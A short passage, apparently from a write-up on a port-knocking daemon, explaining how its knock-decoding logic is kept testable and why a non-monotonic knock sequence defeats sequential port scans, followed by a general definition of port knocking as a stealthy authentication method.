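In a real dæmon the returned action is where the ipchains call (or the Schedule::At job for a timed close) would go; keeping it as a return value is what makes the decoding logic testable without a firewall. The port-scan case shows why the header is chosen to be non-monotonic: a 100..109 sweep never lines up with 102,100,103.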
Port knocking is a stealthy authentication system that employs closed ports to carry out identification of trusted users. This novel method provides the means of establishing a connection to an application running on a completely isolated system on which no ports initially are open.

made by rahuldutt
